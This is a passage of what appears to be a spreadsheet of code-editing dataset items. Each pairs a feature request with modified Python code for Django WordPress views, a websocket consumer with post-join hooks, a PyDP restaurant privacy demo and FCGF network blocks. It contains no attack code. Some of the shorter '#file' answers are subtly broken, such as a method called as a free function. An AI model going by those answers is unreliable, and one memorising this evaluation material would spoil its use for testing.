= None\n    child_cache = None\n\n    class Meta:\n        db_table = \'%s_posts\' % TABLE_PREFIX\n        get_latest_by = \'post_date\'\n        ordering = ["-post_date"]\n        managed = False\n\n    def __unicode__(self):\n        return self.title\n\n    def save(self, **kwargs):\n        if self.parent_id is None:\n            self.parent_id = 0\n        super(Post, self).save(**kwargs)\n        self.child_cache = None\n        self.term_cache = None\n\n    @models.permalink\n    def get_absolute_url(self):\n        return (\'wp_object_detail\', (\n            self.post_date.year,\n            "%02i" % self.post_date.month,\n            "%02i" % self.post_date.day,\n            self.slug\n        ))\n\n    def _get_children(self):\n        if self.child_cache is None:\n            self.child_cache = list(Post.objects.filter(parent_id=self.pk))\n        return self.child_cache\n\n    def _get_terms(self, taxonomy):\n        if not self.term_cache:\n            self.term_cache = collections.defaultdict(list)\n            qs = Taxonomy.objects.filter(relationships__object_id=self.id).select_related()\n            qs = qs.order_by(\'relationships__order\', \'term__name\')\n            term_ids = [tax.term_id for tax in qs]\n            terms = {}\n            for term in Term.objects.filter(id__in=term_ids):\n                terms[term.id] = term\n            for tax in qs:\n                if tax.term_id in terms:\n                    self.term_cache[tax.name].append(terms[tax.term_id])\n        return self.term_cache.get(taxonomy)\n\n    @property\n    def children(self):\n        return self._get_children()\n\n    @property\n    def parent(self):\n        if self.parent_id:\n            return Post.objects.get(pk=self.parent_id)\n\n    @parent.setter\n    def parent(self, post):\n        if post.pk is None:\n            raise ValueError(\'parent post must have an ID\')\n        self.parent_id = post.pk\n\n    def categories(self):\n        return self._get_terms("category")\n\n    def attachments(self):\n        for post in self._get_children():\n            if post.post_type == \'attachment\':\n                yield {\n                    \'id\': post.id,\n                    \'slug\': post.slug,\n                    \'timestamp\': post.post_date,\n                    \'description\': post.content,\n                    \'title\': post.title,\n                    \'guid\': post.guid,\n                    \'mimetype\': post.mime_type,\n                }\n\n    def tags(self):\n        return self._get_terms("post_tag")\n\n\n# File 2: wordpress/views.py - Modified Archive class\n\nclass Archive(generic.dates.ArchiveIndexView):\n\n    allow_empty = True\n    context_object_name = \'post_list\'\n    paginate_by = PER_PAGE\n    template_name = \'wordpress/post_archive.html\'\n    date_field = \'post_date\'\n\n    def get(self, request, *args, **kwargs):\n        p = request.GET.get(\'p\')\n        if p:\n            return Preview.as_view()(request, p=p)\n        return super(Archive, self).get(request, *args, **kwargs)\n\n    def get_queryset(self):\n        return Post.objects.published().select_related()\n\n    #Modify - Add featured posts to context\n    def get_context_data(self, **kwargs):\n        context = super(Archive, self).get_context_data(**kwargs)\n        #New - Fetch featured posts and add to context\n        context[\'featured_posts\'] = Post.objects.featured().select_related()[:5]\n        return context\n\n\n#New - Add FeaturedPostsView class for dedicated featured posts display\nclass FeaturedPostsView(generic.list.ListView):\n    """\n    View to display featured posts.\n    """\n    allow_empty = True\n    context_object_name = \'featured_posts\'\n    paginate_by = PER_PAGE\n    template_name = \'wordpress/featured_posts.html\'\n    queryset = Post.objects.featured().select_related()'}</t>
  </si>
  <si>
    <t>{'#file 1': "class PostManager(WordPressManager):\n    def _by_status(self, status, post_type='post'):\n        return self.filter(status=status, post_type=post_type)\n            .select_related().prefetch_related('meta')\n\n    #Modify\n    def get_featured_posts(self, count=5):\n        return self.filter(status='publish', post_type='post').order_by('-post_date')[:count]", '#file 2': 'class PostDetail(generic.dates.DateDetailView):\n    allow_future = True\n    context_object_name = \'post\'\n    date_field = \'post_date\'\n    month_format = "%m"\n    queryset = Post.objects.published()\n\n    #Modify\n    def get_context_data(self, **kwargs):\n        context = super(PostDetail, self).get_context_data(**kwargs)\n        context[\'featured_posts\'] = Post.objects.get_featured_posts()\n        return context', '#file 3': "class Archive(generic.dates.ArchiveIndexView):\n    allow_empty = True\n    context_object_name = 'post_list'\n    paginate_by = PER_PAGE\n    template_name = 'wordpress/post_archive.html'\n    date_field = 'post_date'\n\n    def get_queryset(self):\n        return Post.objects.published().select_related()\n\n    #Modify\n    def get_context_data(self, **kwargs):\n        context = super(Archive, self).get_context_data(**kwargs)\n        context['featured_posts'] = Post.objects.get_featured_posts()\n        return context", '#file 4': '#New\nfrom wordpress.models import Post\n\ndef get_featured_posts(count=5):\n    return Post.objects.get_featured_posts(count)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'async def command_join(self, name: str, state: str, children: dict[str, ChildComponent] | None = None) in ReactorConsumer class', 'invoking_code_segment': 'path("__reactor__", ReactorConsumer.as_asgi()) in websocket_urlpatterns and receive_json method that dispatches to command_join', 'feature_description': 'Add a new feature to handle additional logic when a component joins by introducing a post-join hook mechanism that allows custom processing after a component successfully joins, including validation, logging, and state initialization callbacks.', 'modified_complete_code': '# reactor/reactor/consumer.py\nimport json\nimport logging\nimport typing as t\n\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.core.signing import Signer\nfrom django.utils.datastructures import MultiValueDict\n\nfrom reactor.component import Component\n\nfrom . import serializer\nfrom .repository import ComponentRepository\nfrom .utils import parse_request_data\n\nlog = logging.getLogger("reactor")\n\n\nclass ChildComponent(t.TypedDict):\n    name: str\n    state: str\n\n\n# New: Define callback type for post-join hooks\nPostJoinCallback = t.Callable[[Component, dict[str, t.Any]], t.Awaitable[None]]\n\n\nclass ReactorConsumer(AsyncJsonWebsocketConsumer):\n    # New: Add post-join callbacks registry\n    post_join_callbacks: list[PostJoinCallback] = []\n\n    @property\n    def user(self):\n        return self.scope.get("user") or AnonymousUser()\n\n    async def connect(self):\n        await super().connect()\n        self.subscriptions = set()\n        self.query_string: str = ""\n        self.repo = ComponentRepository(\n            is_live=True,\n            user=self.user,\n            channel_name=self.channel_name,\n            channel_layer=self.channel_layer,\n        )\n\n    # Fronted commands\n\n    async def receive_json(self, content):\n        await getattr(self, f\'command_{content["command"]}\')(\n            **content["payload"]\n        )\n\n    # Modify: Enhanced command_join with post-join hook support\n    async def command_join(\n        self,\n        name: str,\n        state: str,\n        children: dict[str, ChildComponent] | None = None,\n    ):\n        signer = Signer()\n        decoded_state: dict[str, t.Any] = json.loads(signer.unsign(state))\n        decoded_children: dict[str, tuple[str, dict[str, t.Any]]] = {\n            id: (name, json.loads(signer.unsign(state)))\n            for id, (name, state) in (children or {}).items()\n        }\n        log.debug(f"&lt;&lt;&lt; JOIN {name} {decoded_state}")\n        try:\n            component = await self.repo.join(\n                name,\n                decoded_state,\n                children=decoded_children,\n            )\n        except Exception as e:\n            log.exception(e)\n            if id := decoded_state.get("id"):\n                await self.component_remove(id)\n        else:\n            # New: Execute post-join hooks\n            await self._execute_post_join_hooks(component, decoded_state)\n            await self.send_render(component)\n            await self.after_mutation_chores()\n\n    # New: Method to execute post-join callbacks\n    async def _execute_post_join_hooks(\n        self, component: Component, state: dict[str, t.Any]\n    ) -&gt; None:\n        """Execute all registered post-join callbacks for the component."""\n        for callback in self.post_join_callbacks:\n            try:\n                await callback(component, state)\n                log.debug(f"Post-join hook executed for component {component.id}")\n            except Exception as e:\n                log.exception(f"Error in post-join hook for {component.id}: {e}")\n\n    # New: Class method to register post-join callbacks\n    @classmethod\n    def register_post_join_callback(cls, callback: PostJoinCallback) -&gt; None:\n        """Register a callback to be executed after component join."""\n        cls.post_join_callbacks.append(callback)\n\n    async def command_leave(self, id):\n        log.debug(f"&lt;&lt;&lt; LEAVE {id}")\n        self.repo.remove(id)\n\n    async def command_query_string(self, qs: str):\n        self.query_string = qs\n        self.repo.set_query_string(qs)\n\n    async def command_user_event(\n        self, id, command, implicit_args, explicit_args\n    ):\n        kwargs = dict(\n            parse_request_data(MultiValueDict(implicit_args)), **explicit_args\n        )\n        log.debug(f"&lt;&lt;&lt; USER-EVENT {id} {command} {kwargs}")\n        component = await self.repo.dispatch_event(id, command, [], kwargs)\n        await self.send_render(component)\n        await self.after_mutation_chores()\n\n    # Component commands\n\n    async def message_from_component(self, data):\n        await getattr(self, f"component_{data[\'command\']}")(**data["kwargs"])\n\n    async def component_dispatch_event(self, id, command, args, kwargs):\n        log.debug(f"&lt;&lt;&lt; EVENT {id} {command} {args} {kwargs}")\n        component = await self.repo.dispatch_event(id, command, args, kwargs)\n        await self.send_render(component)\n        await self.after_mutation_chores()\n\n    async def component_remove(self, id):\n        log.debug(f"&gt;&gt;&gt; REMOVE {id}")\n        await self.send_command("remove", {"id": id})\n\n    async def component_send_render(self, id):\n        log.debug(f"&gt;&gt;&gt; SEND-RENDER {id}")\n        if component := self.repo.get(id):\n            await self.send_render(component)\n\n    async def component_dom_action(self, action, id, html):\n        log.debug(f"&gt;&gt;&gt; DOM {action.upper()} {id}")\n        await self.send_command(action, {"id": id, "html": html})\n\n    async def component_scroll_into_view(self, id, behavoir, block, inline):\n        log.debug(f"&gt;&gt;&gt; SCROLL-INTO-VIEW {id}")\n        await self.send_command(\n            "scroll_into_view",\n            {"id": id, "behavoir": behavoir, "block": block, "inline": inline},\n        )\n\n    async def component_focus_on(self, selector):\n        log.debug(f\'&gt;&gt;&gt; FOCUS ON "{selector}"\')\n        await self.send_command("focus_on", {"selector": selector})\n\n    async def component_url_change(self, command: str, url: str):\n        log.debug(f\'&gt;&gt;&gt; URL {command.upper()} "{url}"\')\n        await self.send_command("url_change", {"url": url, "command": command})\n\n    # Incoming messages from subscriptions\n\n    async def model_mutation(self, data):\n        await self._dispatch_notifications(\n            "mutation",\n            data["channel"],\n            {\n                "instance": serializer.decode(data["instance"]),\n                "action": data["action"],\n            },\n        )\n\n    async def notification(self, data):\n        await self._dispatch_notifications(\n            "notification", data["channel"], data["kwargs"]\n        )\n\n    async def _dispatch_notifications(\n        self, receiver: str, channel: str, kwargs: dict[str, t.Any]\n    ):\n        for component in self.repo.components_subscribed_to(channel):\n            await getattr(component, receiver)(channel, **kwargs)\n            await self.send_render(component)\n        await self.after_mutation_chores()\n\n    # Reply to front-end\n\n    async def send_render(self, component: Component):\n        diff = await component._render_diff(self.repo)\n        if diff is not None:\n            log.debug(f"&gt;&gt;&gt; RENDER {component._name} {component.id}")\n            await self.send_command(\n                "render",\n                {"id": component.id, "diff": diff},\n            )\n\n    async def send_command(self, command, payload):\n        await self.send_json({"command": command, "payload": payload})\n\n    async def after_mutation_chores(self):\n        await self.update_to_which_channels_im_subscribed_to()\n        await self.send_query_string()\n\n    async def update_to_which_channels_im_subscribed_to(self):\n        if self.channel_layer is not None and self.channel_name is not None:\n            subscriptions = self.repo.subscriptions\n\n            for channel in subscriptions - self.subscriptions:\n                log.debug(f"::: SUBSCRIBE {self.channel_name} to {channel}")\n                await self.channel_layer.group_add(channel, self.channel_name)\n\n            for channel in self.subscriptions - subscriptions:\n                log.debug(f"::: UNSUBSCRIBE {self.channel_name} to {channel}")\n                await self.channel_layer.group_discard(\n                    channel, self.channel_name\n                )\n\n            self.subscriptions = subscriptions\n\n    async def send_query_string(self):\n        new_qs = self.repo.get_query_string()\n        if self.query_string != new_qs:\n            self.query_string = new_qs\n            log.debug(f"&gt;&gt;&gt; QS {new_qs}")\n            await self.send_command("set_query_string", {"qs": new_qs})\n\n\n# reactor/reactor/urls.py\n# Modify: Enhanced to support post-join hook registration\nfrom django.urls import path\n\nfrom .consumer import ReactorConsumer\n\n# New: Example post-join hook for logging and validation\nasync def log_component_join(component, state):\n    """Post-join hook to log component initialization."""\n    import logging\n    logger = logging.getLogger("reactor")\n    logger.info(f"Component {component._name} (id={component.id}) joined with state: {state}")\n\n# New: Register the post-join hook\nReactorConsumer.register_post_join_callback(log_component_join)\n\nwebsocket_urlpatterns = [\n    path("__reactor__", ReactorConsumer.as_asgi()),  # type: ignore\n]'}</t>
  </si>
  <si>
    <t>{'#file 1': 'async def command_join(self, name: str, state: str, children: dict[str, ChildComponent] | None = None):\n    signer = Signer()\n    decoded_state: dict[str, t.Any] = json.loads(signer.unsign(state))\n    decoded_children: dict[str, tuple[str, dict[str, t.Any]]] = {\n        id: (name, json.loads(signer.unsign(state)))\n        for id, (name, state) in (children or {}).items()\n    }\n    log.debug(f"&lt;&lt;&lt; JOIN {name} {decoded_state}")\n    try:\n        component = await self.repo.join(\n            name,\n            decoded_state,\n            children=decoded_children,\n        )\n        #Modify: Call new feature handler\n        component = await new_feature_handler(component)\n    except Exception as e:\n        log.exception(e)\n        if id := decoded_state.get("id"):\n            await self.component_remove(id)\n    else:\n        await self.send_render(component)\n        await self.after_mutation_chores()', '#file 2': 'async def receive_json(self, content):\n    await getattr(self, f\'command_{content["command"]}\')(\n        **content["payload"]\n    )', '#file 3': 'async def model_mutation(self, data):\n    await self._dispatch_notifications(\n        "mutation",\n        data["channel"],\n        {\n            "instance": serializer.decode(data["instance"]),\n            "action": data["action"],\n        },\n    )', '#file 4': 'async def new_feature_handler(self, component):\n    # New feature logic here\n    log.debug(f"New feature invoked for component {component.id}")\n    # Example: Modify component state\n    component.state[\'new_feature_data\'] = \'New data\'\n    return component'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class RestaurantStatistics with methods count_visits_per_hour(), get_non_private_counts_per_hour(), and get_private_counts_per_hour()', 'invoking_code_segment': "if __name__ == '__main__' block calling r.count_visits_per_hour() and printing results", 'feature_description': 'Add a feature to calculate the average number of visits per hour using both non-private and private counts, returning averages alongside the existing count dictionaries', 'modified_complete_code': '# File 1: PyDP/src/pydp/algorithms/laplacian/_bounded_algorithms.py (No changes needed)\n\n# File 2: PyDP/examples/Tutorial_2-restaurant_demo/restaurant.py\n\n# stdlib\nfrom collections import defaultdict\nimport math\n\n# third party\nimport pandas as pd\n\n# pydp absolute\nimport pydp as dp\nfrom pydp.algorithms.laplacian import BoundedSum\nfrom pydp.algorithms.laplacian import Count\n\n# Assumptions:\nOPENING_HOUR = 900\nCLOSING_HOUR = 2000\nVALID_HOURS = list(range(OPENING_HOUR, CLOSING_HOUR + 1))\nCOUNT_MAX_CONTRIBUTED_DAYS = 3\nSUM_MAX_CONTRIBUTED_DAYS = 4\nMIN_EUROS_SPENT = 0\nMAX_EUROS_SPENT_1 = 50\nMAX_EUROS_SPENT_2 = 65\nLN_3 = math.log(3)\n\nclass RestaurantStatistics:\n    """Class to replicate the restaurant example from Google\'s DP library.\n    Includes both Count and Sum operations.\n    Original code in java:\n     - https://github.com/google/differential-privacy/tree/main/examples/java"""\n\n    def __init__(self, hours_filename, days_filename, epsilon=LN_3):\n        self.hours_filename = hours_filename\n        self.days_filename = days_filename\n        self._epsilon = epsilon\n        self._hour_visits = pd.read_csv(self.hours_filename, sep=",")\n        self._day_visits = pd.read_csv(self.days_filename, sep=",")\n\n    #Modify: Updated to return tuple with averages\n    def count_visits_per_hour(self) -&gt; tuple:\n        """Compute the number of visits per hour of day and return two dictionaries\n        that map an hour to the number of visits in that hour, plus average visits.\n\n        The first dictionary is the count calculation without any differential privacy, while the second one uses the PyDP library for a private calculation\n        """\n        non_private_counts = self.get_non_private_counts_per_hour()\n        private_counts = self.get_private_counts_per_hour()\n        #New: Calculate averages\n        non_private_avg = self.calculate_average_visits_per_hour(non_private_counts)\n        private_avg = self.calculate_average_visits_per_hour(private_counts)\n        return non_private_counts, private_counts, non_private_avg, private_avg\n\n    def count_visits_per_day(self) -&gt; tuple:\n        """Compute the number of visits per hour of day and return two dictionaries\n        that map a day to the number of visits in that day.\n\n        The first dictionary is the count calculation without any differential privacy,\n        while the second one uses the PyDP library for a private calculation\n        """\n        non_private_counts = self.get_non_private_counts_per_day()\n        private_counts = self.get_private_counts_per_day()\n        return non_private_counts, private_counts\n\n    def sum_revenue_per_day(self) -&gt; tuple:\n        """Compute the restaurant\'s daily revenue for the whole week.\n\n        The first dictionary is the count calculation without any differential privacy,\n        while the second one uses the PyDP library for a private calculation\n        """\n        non_private_sum = self.get_non_private_sum_revenue()\n        private_sum = self.get_private_sum_revenue()\n        return non_private_sum, private_sum\n\n    def sum_revenue_per_day_with_preaggregation(self) -&gt; tuple:\n        """Calculates the restaurant\'s daily revenue for the whole week, while\n        pre-agreggating each visitor\'s spending before calculating the\n        BoundedSum with PyDP.\n\n        The first dictionary is the count calculation without any differential privacy,\n        while the second one uses the PyDP library for a private calculation\n        """\n        non_private_sum = self.get_non_private_sum_revenue()\n        private_sum = self.get_private_sum_revenue_with_preaggregation()\n        return non_private_sum, private_sum\n\n    def get_non_private_counts_per_hour(self) -&gt; dict:\n        """Compute the number of visits per hour without any differential privacy.\n\n        Return a dictionary mapping hours to number of visits\n        """\n        hours_count = dict()\n        visits = self._hour_visits.copy()\n        visits["Time entered"] = (\n            pd.to_datetime(visits["Time entered"])\n            .apply(lambda x: x.strftime(r"%H%M"))\n            .astype(int)\n        )\n        valid_visits = visits[visits["Time entered"].isin(VALID_HOURS)]\n        valid_visits["Time entered"] = valid_visits["Time entered"].apply(\n            lambda x: int(str(x)[:2]) if len(str(x)) == 4 else int(str(x)[:1])\n        )\n        for time in valid_visits["Time entered"].unique():\n            hours_count[time] = valid_visits[valid_visits["Time entered"] == time][\n                "Time entered"\n            ].count()\n        return hours_count\n\n    def get_private_counts_per_hour(self, epsilon: float = None) -&gt; dict:\n        """Compute an anonymized (within a given threshold of epsilon) version of the number of visits per hour.\n\n        Return a dictionary mapping hours to number of visits"""\n        private_hours_count = dict()\n        visits = self._hour_visits.copy()\n        visits["Time entered"] = (\n            pd.to_datetime(visits["Time entered"])\n            .apply(lambda x: x.strftime(r"%H"))\n            .astype(int)\n        )\n        if not epsilon:\n            x = Count(epsilon=self._epsilon, dtype="int")\n        else:\n            x = Count(epsilon=epsilon, dtype="int")\n        for time in visits["Time entered"].unique():\n            private_hours_count[time] = x.quick_result(\n                data=list(\n                    visits[visits["Time entered"] == time]["Time entered"].astype(int)\n                )\n            )\n        return private_hours_count\n\n    #New: Calculate average visits per hour\n    def calculate_average_visits_per_hour(self, counts_dict: dict) -&gt; float:\n        """Calculate the average number of visits per hour from a counts dictionary.\n        \n        Args:\n            counts_dict: Dictionary mapping hours to visit counts\n            \n        Returns:\n            Average visits per hour as a float\n        """\n        if not counts_dict:\n            return 0.0\n        total_visits = sum(counts_dict.values())\n        num_hours = len(counts_dict)\n        return total_visits / num_hours if num_hours &gt; 0 else 0.0\n\n    def get_non_private_counts_per_day(self) -&gt; dict:\n        """Compute the number of visits per day without any differential privacy.\n\n        Return a dictionary mapping days to number of visits\n        """\n        day_counts = dict()\n        for day in self._day_visits["Day"].unique():\n            day_counts[day] = self._day_visits[self._day_visits["Day"] == day][\n                "Day"\n            ].count()\n        return day_counts\n\n    def get_private_counts_per_day(self, epsilon: float = None) -&gt; dict:\n        """Compute an anonymized (within a given threshold of epsilon) version of the number of visits per day.\n\n        Return a dictionary mapping days to number of visits\n        """\n        day_visits = bound_visits_per_week(self._day_visits, COUNT_MAX_CONTRIBUTED_DAYS)\n        day_counts = dict()\n        if not epsilon:\n            x = Count(\n                epsilon=self._epsilon,\n                l0_sensitivity=COUNT_MAX_CONTRIBUTED_DAYS,\n                dtype="int",\n            )\n        else:\n            x = Count(\n                epsilon=epsilon, l0_sensitivity=COUNT_MAX_CONTRIBUTED_DAYS, dtype="int"\n            )\n        for day in day_visits["Day"].unique():\n            day_counts[day] = x.quick_result(\n                data=list(day_visits[day_visits["Day"] == day]["Day"])\n            )\n        return day_counts\n\n    def get_non_private_sum_revenue(self) -&gt; dict:\n        """Compute the revenue per day of visits without any differential privacy.\n\n        Return a dictionary mapping days to revenue\n        """\n        day_revenue = dict()\n        for day in self._day_visits["Day"].unique():\n            day_revenue[day] = self._day_visits[self._day_visits["Day"] == day][\n                "Money spent (euros)"\n            ].sum()\n        return day_revenue\n\n    def get_private_sum_revenue(self, epsilon: float = None) -&gt; dict:\n        """Compute an anonymized (within a given threshold of epsilon) version of the revenue per day. Return a dictionary mapping days to revenue"""\n        day_visits = bound_visits_per_week(self._day_visits, SUM_MAX_CONTRIBUTED_DAYS)\n        day_revenue = dict()\n        if not epsilon:\n            x = BoundedSum(\n                epsilon=self._epsilon,\n                delta=0,\n                lower_bound=MIN_EUROS_SPENT,\n                upper_bound=MAX_EUROS_SPENT_1,\n                l0_sensitivity=SUM_MAX_CONTRIBUTED_DAYS,\n            )\n        else:\n            x = BoundedSum(\n                epsilon=epsilon,\n                delta=0,\n                lower_bound=MIN_EUROS_SPENT,\n                upper_bound=MAX_EUROS_SPENT_1,\n                l0_sensitivity=SUM_MAX_CONTRIBUTED_DAYS,\n            )\n        for day in day_visits["Day"].unique():\n            x.reset()\n            x.add_entries(\n                data=list(day_visits[day_visits["Day"] == day]["Money spent (euros)"])\n            )\n            day_revenue[day] = int(x.result())\n        return day_revenue\n\n    def get_private_sum_revenue_with_preaggregation(\n        self, epsilon: float = None\n    ) -&gt; dict:\n        """Compute an anonymized (within a given threshold of epsilon) version of the revenue per day.\n\n        Before performing the computation,\n        we pre-aggregate each visitor\' spending for the day. Return a dictionary mapping days to revenue\n        """\n        day_visits = bound_visits_per_week(self._day_visits, SUM_MAX_CONTRIBUTED_DAYS)\n        day_revenue = dict()\n        if not epsilon:\n            x = BoundedSum(\n                epsilon=self._epsilon,\n                delta=0,\n                lower_bound=MIN_EUROS_SPENT,\n                upper_bound=MAX_EUROS_SPENT_2,\n                l0_sensitivity=SUM_MAX_CONTRIBUTED_DAYS,\n            )\n        else:\n            x = BoundedSum(\n                epsilon=epsilon,\n                delta=0,\n                lower_bound=MIN_EUROS_SPENT,\n                upper_bound=MAX_EUROS_SPENT_2,\n                l0_sensitivity=SUM_MAX_CONTRIBUTED_DAYS,\n            )\n        for day in day_visits["Day"].unique():\n            visits_on_day = day_visits[day_visits["Day"] == day][\n                ["VisitorId", "Money spent (euros)"]\n            ]\n            visitor_to_spending = dict()\n            for visitor in visits_on_day["VisitorId"].unique():\n                visitor_to_spending[visitor] = visits_on_day[\n                    visits_on_day["VisitorId"] == visitor\n                ]["Money spent (euros)"].sum()\n            spending = list(visitor_to_spending.values())\n            x.reset()\n            x.add_entries(data=spending)\n            day_revenue[day] = int(x.result())\n        return day_revenue\n\ndef bound_visits_per_week(df, limit):\n    """Utility function to modify the input dataframes.\n\n    Makes sure that each visitor only contributes at most 3 visits per week,\n    Returns an updated dataframe\n    """\n    df = df.sample(frac=1)\n    updated_df = pd.DataFrame(columns=df.columns)\n    df_idx = 0\n    id_to_visited = defaultdict(int)\n    for index in df.index:\n        if id_to_visited[df.loc[index]["VisitorId"]] &lt; limit:\n            updated_df.loc[df_idx] = df.loc[index]\n            df_idx += 1\n            id_to_visited[df.loc[index]["VisitorId"]] += 1\n    return updated_df\n\nif __name__ == "__main__":\n    r = RestaurantStatistics(\n        hours_filename="day_data.csv", days_filename="week_data.csv"\n    )\n\n    #Modify: Updated to unpack averages\n    np_count_hour, p_count_hour, np_avg_hour, p_avg_hour = r.count_visits_per_hour()\n    print("-----------------------------------")\n    print("Visits per hour:")\n    print("Without differential privacy:", np_count_hour)\n    print("With differential privacy:", p_count_hour)\n    #New: Print averages\n    print("Average visits per hour (non-private):", round(np_avg_hour, 2))\n    print("Average visits per hour (private):", round(p_avg_hour, 2))\n    print("-----------------------------------")\n\n    np_count_day, p_count_day = r.count_visits_per_day()\n    print("Visits per day:")\n    print("Without differential privacy:", np_count_day)\n    print("With differential privacy:", p_count_day)\n    print("-----------------------------------")\n\n    np_sum_day, p_sum_day = r.sum_revenue_per_day()\n    print("Revenue per day:")\n    print("Without differential privacy:", np_sum_day)\n    print("With differential privacy:", p_sum_day)\n    print("-----------------------------------")\n\n    np_sum_day_pa, p_sum_day_pa = r.sum_revenue_per_day_with_preaggregation()\n    print("Revenue per day with preaggregation:")\n    print("Without differential privacy:", np_sum_day_pa)\n    print("With differential privacy:", p_sum_day_pa)\n    print("-----------------------------------")'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def get_non_private_counts_per_hour(self) -&gt; dict:\n    """Compute the number of visits per hour without any differential privacy.\n\n    Return a dictionary mapping hours to number of visits\n    """\n    hours_count = dict()\n\n    # Parse times so its easy to check whether they are valid\n    visits = self._hour_visits.copy()\n    visits[\'Time entered\'] = (\n        pd.to_datetime(visits[\'Time entered\'])\n        .apply(lambda x: x.strftime(r\'%H%M\'))\n        .astype(int)\n    )\n\n    # Only select the visits that happened during the valid hours\n    valid_visits = visits[visits[\'Time entered\'].isin(VALID_HOURS)]\n\n    # Only count the hours without the minutes (12:00 and 12:30 both add 1 to the 12 count)\n    valid_visits[\'Time entered\'] = valid_visits[\'Time entered\'].apply(\n        lambda x: int(str(x)[:2]) if len(str(x)) == 4 else int(str(x)[:1])\n    )\n\n    for time in valid_visits[\'Time entered\'].unique():\n        hours_count[time] = valid_visits[valid_visits[\'Time entered\'] == time][\n            \'Time entered\'\n        ].count()\n\n    return hours_count\n\n#Modify\ndef count_visits_per_hour(self) -&gt; tuple:\n    """Compute the number of visits per hour of day and return two dictionaries\n    that map an hour to the number of visits in that hour.\n\n    The first dictionary is the count calculation without any differential privacy, while the second one uses the PyDP library for a private calculation\n    """\n    non_private_counts = self.get_non_private_counts_per_hour()\n    private_counts = self.get_private_counts_per_hour()\n\n    #New\n    from new_file import calculate_average_visits_per_hour\n    average_counts = calculate_average_visits_per_hour(non_private_counts, private_counts)\n\n    return non_private_counts, private_counts, average_counts', '#file 2': "if __name__ == '__main__':\n    r = RestaurantStatistics(hours_filename='day_data.csv', days_filename='week_data.csv')\n\n    np_count_hour, p_count_hour, avg_count_hour = r.count_visits_per_hour()\n    print('-----------------------------------')\n    print('Visits per hour:')\n    print('Without differential privacy:', np_count_hour)\n    print('With differential privacy:', p_count_hour)\n    print('Average visits per hour:', avg_count_hour)\n    print('-----------------------------------')", '#file 3': '', '#file 4': 'def calculate_average_visits_per_hour(non_private_counts, private_counts) -&gt; dict:\n    """Calculate the average number of visits per hour based on non-private and private counts.\n\n    Returns a dictionary mapping hours to average visits.\n    """\n    average_visits = {}\n    for hour in non_private_counts:\n        average_visits[hour] = (non_private_counts[hour] + private_counts[hour]) / 2\n    return average_visits'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class BasicBlockBase(nn.Module):\n  def forward(self, x):\n    residual = x\n    out = self.conv1(x)\n    out = self.norm1(out)\n    out = MEF.relu(out)\n    out = self.conv2(out)\n    out = self.norm2(out)\n    if self.downsample is not None:\n      residual = self.downsample(x)\n    out += residual\n    out = MEF.relu(out)\n    return out', 'invoking_code_segment': 'class ResUNet2(ME.MinkowskiNetwork):\n  def forward(self, x):\n    out_s1 = self.conv1(x)\n    out_s1 = self.norm1(out_s1)\n    out_s1 = self.block1(out_s1)\n    out = MEF.relu(out_s1)\n    ...\n    out = self.final(out)\n    if self.normalize_feature:\n      return ME.SparseTensor(\n          out.F / torch.norm(out.F, p=2, dim=1, keepdim=True),\n          coordinate_map_key=out.coordinate_map_key,\n          coordinate_manager=out.coordinate_manager)\n    else:\n      return out', 'feature_description': 'Add a feature to normalize the output features in the forward method of residual_block.py. This allows BasicBlockBase to optionally normalize its output features using L2 normalization, making the feature representation more consistent and improving model performance in feature matching tasks.', 'modified_complete_code': "# FCGF/model/residual_block.py\nimport torch\nimport torch.nn as nn\nfrom model.common import get_norm\nimport MinkowskiEngine as ME\nimport MinkowskiEngine.MinkowskiFunctional as MEF\n\nclass BasicBlockBase(nn.Module):\n  expansion = 1\n  NORM_TYPE = 'BN'\n\n  def __init__(self,\n               inplanes,\n               planes,\n               stride=1,\n               dilation=1,\n               downsample=None,\n               bn_momentum=0.1,\n               normalize_feature=False,  #New parameter for feature normalization\n               D=3):\n    super(BasicBlockBase, self).__init__()\n\n    self.conv1 = ME.MinkowskiConvolution(\n        inplanes, planes, kernel_size=3, stride=stride, dimension=D)\n    self.norm1 = get_norm(self.NORM_TYPE, planes, bn_momentum=bn_momentum, D=D)\n    self.conv2 = ME.MinkowskiConvolution(\n        planes,\n        planes,\n        kernel_size=3,\n        stride=1,\n        dilation=dilation,\n        bias=False,\n        dimension=D)\n    self.norm2 = get_norm(self.NORM_TYPE, planes, bn_momentum=bn_momentum, D=D)\n    self.downsample = downsample\n    self.normalize_feature = normalize_feature  #New attribute\n\n  def forward(self, x):\n    residual = x\n\n    out = self.conv1(x)\n    out = self.norm1(out)\n    out = MEF.relu(out)\n\n    out = self.conv2(out)\n    out = self.norm2(out)\n\n    if self.downsample is not None:\n      residual = self.downsample(x)\n\n    out += residual\n    out = MEF.relu(out)\n\n    #Modify: Add feature normalization if enabled\n    if self.normalize_feature:\n      out = ME.SparseTensor(\n          out.F / torch.norm(out.F, p=2, dim=1, keepdim=True),\n          coordinate_map_key=out.coordinate_map_key,\n          coordinate_manager=out.coordinate_manager)\n\n    return out\n\nclass BasicBlockBN(BasicBlockBase):\n  NORM_TYPE = 'BN'\n\nclass BasicBlockIN(BasicBlockBase):\n  NORM_TYPE = 'IN'\n\ndef get_block(norm_type,\n              inplanes,\n              planes,\n              stride=1,\n              dilation=1,\n              downsample=None,\n              bn_momentum=0.1,\n              normalize_feature=False,  #New parameter\n              D=3):\n  if norm_type == 'BN':\n    return BasicBlockBN(inplanes, planes, stride, dilation, downsample, bn_momentum, normalize_feature, D)\n  elif norm_type == 'IN':\n    return BasicBlockIN(inplanes, planes, stride, dilation, downsample, bn_momentum, normalize_feature, D)\n  else:\n    raise ValueError(f'Type {norm_type}, not defined')\n\n# FCGF/model/resunet.py\n# Modify: Update ResUNet2 to pass normalize_feature to get_block\nclass ResUNet2(ME.MinkowskiNetwork):\n  NORM_TYPE = None\n  BLOCK_NORM_TYPE = 'BN'\n  CHANNELS = [None, 32, 64, 128, 256]\n  TR_CHANNELS = [None, 32, 64, 64, 128]\n\n  def __init__(self,\n               in_channels=3,\n               out_channels=32,\n               bn_momentum=0.1,\n               normalize_feature=None,\n               conv1_kernel_size=None,\n               D=3):\n    ME.MinkowskiNetwork.__init__(self, D)\n    NORM_TYPE = self.NORM_TYPE\n    BLOCK_NORM_TYPE = 